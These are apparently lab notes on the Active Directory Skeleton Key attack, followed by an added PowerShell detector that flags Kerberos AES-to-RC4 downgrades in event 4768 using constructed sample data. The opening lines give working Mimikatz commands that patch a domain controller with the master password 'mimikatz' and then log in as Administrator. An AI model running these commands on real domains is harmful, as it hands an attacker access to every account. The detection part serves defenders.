Skeleton Key
The Skeleton Key attack bypasses AD authentication by injecting a master password into the DC. With this master password, we can authenticate as any user.
# Use the command below to inject a skeleton key (the password would be "mimikatz") on a Domain Controller of choice. DA privileges are required.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
# Now it is possible to access any machine with a valid username and the password "mimikatz"
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
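
A defender-side check for the technique above, added here as an example and not part of the original notes: it reports accounts whose Kerberos TGT requests (Security event 4768) switch from AES to RC4 on a DC. It assumes the RC4 fallback that encryption-downgrade detections for Skeleton Key rely on, and that this fallback is visible in the event's ticket encryption type; the function name and the sample records are constructed for illustration.

```powershell
# Added example: flag accounts whose TGT requests (event 4768) drop from AES to RC4.
# Input objects need TimeCreated, TargetUserName, TicketEncryptionType and IpAddress,
# e.g. mapped by name from ([xml]$_.ToXml()).Event.EventData.Data for each record of
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768 } on the DC.
function Find-KerberosRc4Downgrade {
    param([Parameter(Mandatory)] [object[]] $Events)

    $aes = '0x11', '0x12'   # AES128 / AES256
    $rc4 = '0x17'           # RC4-HMAC
    foreach ($group in ($Events | Group-Object TargetUserName)) {
        $seenAes = $false
        foreach ($e in ($group.Group | Sort-Object TimeCreated)) {
            if ($aes -contains $e.TicketEncryptionType) { $seenAes = $true; continue }
            if ($seenAes -and $e.TicketEncryptionType -eq $rc4) {
                # Account had AES tickets earlier in the window and now gets RC4
                [pscustomobject]@{
                    Account      = $group.Name
                    DowngradedAt = $e.TimeCreated
                    Source       = $e.IpAddress
                }
                break   # one finding per account
            }
        }
    }
}

# Constructed sample records (not real log data)
$t0 = Get-Date '2024-01-10T09:00:00'
$sample = @(
    [pscustomobject]@{ TimeCreated = $t0;                TargetUserName = 'alice';      TicketEncryptionType = '0x12'; IpAddress = '10.0.0.21' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(5);  TargetUserName = 'svc-legacy'; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.40' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(10); TargetUserName = 'bob';        TicketEncryptionType = '0x12'; IpAddress = '10.0.0.22' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(60); TargetUserName = 'alice';      TicketEncryptionType = '0x17'; IpAddress = '10.0.0.21' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(61); TargetUserName = 'bob';        TicketEncryptionType = '0x17'; IpAddress = '10.0.0.99' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(62); TargetUserName = 'svc-legacy'; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.40' }
)

Find-KerberosRc4Downgrade -Events $sample | Format-Table -AutoSize
```

Accounts that only ever appear with RC4 in the supplied window are not reported, so the input should reach back before the suspected change.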